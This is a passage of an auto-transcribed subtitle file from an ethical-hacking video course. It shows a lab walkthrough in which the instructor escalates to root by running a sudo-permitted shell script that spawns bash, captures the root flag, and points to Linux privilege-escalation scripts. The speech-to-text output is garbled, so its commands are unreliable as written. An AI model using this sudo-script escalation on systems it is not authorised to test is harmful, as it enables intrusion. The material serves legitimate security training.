this file as pseudo and make it execute right and when we execute 374 00:26:52,740 --> 00:26:56,150 it's going to echo out or it's gonna run this script was just as bad. 375 00:26:56,150 --> 00:27:01,350 Josh shy it's going to get me interactive bash shell that interactive bash shell is going to be run 376 00:27:01,380 --> 00:27:05,430 as root because we're executing it with Sudo as root. 377 00:27:05,430 --> 00:27:11,550 Now one thing that we should do here is we should make this file executable if we allow stash L.A. you 378 00:27:11,550 --> 00:27:14,330 can see the permissions here say that we are not executable. 379 00:27:14,340 --> 00:27:16,570 We only have read write access right now. 380 00:27:16,710 --> 00:27:24,780 So let's change this to executable as well and you should always do this on your shell scripts and we'll 381 00:27:24,780 --> 00:27:31,800 say Alice dash L.A. one more time and you can see now the Xs have been added. 382 00:27:31,830 --> 00:27:37,080 OK so with this let's go ahead and sudo this script here. 383 00:27:37,110 --> 00:27:45,380 Let's just say pseudo monitor dot H run that it might take a second. 384 00:27:45,750 --> 00:27:47,010 We could say who am I. 385 00:27:47,040 --> 00:27:49,080 Let's see if this actually works. 386 00:27:49,080 --> 00:27:52,050 So again we're timed out here. 387 00:27:52,200 --> 00:27:55,860 You could see that at time now earlier on a command as well. 388 00:27:55,860 --> 00:27:59,240 So this machine has a little bit of timeout issues. 389 00:27:59,370 --> 00:28:02,730 So just give it a quick second here to load. 390 00:28:02,730 --> 00:28:03,760 And there you go. 391 00:28:04,470 --> 00:28:06,480 And again it says we're nimbler. 392 00:28:06,480 --> 00:28:10,190 Let's try it one more time and say who am I. 393 00:28:10,440 --> 00:28:11,840 And we are still nimbler. 394 00:28:11,850 --> 00:28:13,020 What's our I.T.. 395 00:28:13,100 --> 00:28:14,100 We are still nimbler. 396 00:28:14,100 --> 00:28:16,430 Why are we still nimbler. 397 00:28:16,430 --> 00:28:18,440 Let's take a look again. 398 00:28:18,770 --> 00:28:21,740 So if we can monitor SDH 399 00:28:28,420 --> 00:28:30,750 bash dash I II. 400 00:28:30,910 --> 00:28:42,600 Let's try running this as pseudo home nimbler personal stuff monitor dot s age 401 00:28:47,980 --> 00:28:48,970 and then we'll do it. 402 00:28:48,970 --> 00:28:54,030 I.D. at the end of this and let's give this a go see if this works 403 00:29:01,480 --> 00:29:05,610 and again if you want these scripts all you got to do out there is go out there and Google these. 404 00:29:05,610 --> 00:29:06,760 These are great. 405 00:29:06,820 --> 00:29:11,140 You should find these here on pretty easily. 406 00:29:11,590 --> 00:29:18,660 Let's go to Google and I see we've got our shell back linen room to H download. 407 00:29:18,700 --> 00:29:20,080 You see that. 408 00:29:20,080 --> 00:29:23,470 So reboot user on this one and then Lynn probe checker. 409 00:29:23,470 --> 00:29:26,350 There's actually a Linux privilege escalation. 410 00:29:26,350 --> 00:29:27,460 Oh here we go. 411 00:29:27,460 --> 00:29:30,130 Next privilege escalation scripts down here net SEC. 412 00:29:30,220 --> 00:29:31,450 Pretty good as well. 413 00:29:31,770 --> 00:29:36,950 I'll let a new line checker this got milk blog is actually really good too. 414 00:29:37,030 --> 00:29:42,440 So if you check out the got no blog you can see all the different commands that we're not going to cover 415 00:29:42,440 --> 00:29:47,080 today but he did a great job putting this blog together on what you should be looking for. 416 00:29:47,290 --> 00:29:53,140 And then people went out and automated tools that will help do that same stuff for you. 417 00:29:53,140 --> 00:29:54,960 All that searching for you all the hard work. 418 00:29:55,690 --> 00:30:02,710 So we had you run this and we we tried to pseudo this monitor we had to run the full directory with 419 00:30:02,710 --> 00:30:09,520 monitor in there and that will actually allow us to resolve to the idea of root so doing this pseudo 420 00:30:09,520 --> 00:30:13,540 here does not work doing it this way will work. 421 00:30:13,540 --> 00:30:19,570 So now you can see we are route we can go ahead and take advantage of that by going to the root folder 422 00:30:21,580 --> 00:30:22,720 TWD. 423 00:30:23,590 --> 00:30:24,060 OK. 424 00:30:24,100 --> 00:30:27,580 So we are route at navels right. 425 00:30:27,640 --> 00:30:30,260 So easy easy. 426 00:30:30,280 --> 00:30:30,570 We can. 427 00:30:30,580 --> 00:30:31,820 Alas. 428 00:30:32,200 --> 00:30:33,750 And there's the raw data text. 429 00:30:33,910 --> 00:30:34,770 I keep wanting to do. 430 00:30:34,770 --> 00:30:41,890 I've been working in windows so much lately you can't keep saying type cat or dog text and you can get 431 00:30:41,890 --> 00:30:44,500 your red flag as well and go submit those. 432 00:30:44,530 --> 00:30:50,040 So that is it for this lesson from here. 433 00:30:50,050 --> 00:30:55,720 There is a box that I want you guys to do that box is called optimum luck for the box optimum. 434 00:30:56,050 --> 00:31:02,620 And go ahead and give that a go in the next video we'll cover that as a precursor and then we'll go 435 00:31:02,620 --> 00:31:07,640 into another lesson but give optimum go and see if you can do it on your own. 436 00:31:07,690 --> 00:31:11,650 Give yourself a little confidence and see if you can't root that on your own. 437 00:31:11,800 --> 00:31:13,870 And we'll go from there. 438 00:31:14,110 --> 00:31:14,800 Other than that. 439 00:31:14,800 --> 00:31:16,360 Thank you so much for joining me. 440 00:31:16,360 --> 00:31:17,730 And until next time. 441 00:31:17,740 --> 00:31:20,530 My name is a cyber mentor and I will catch you later.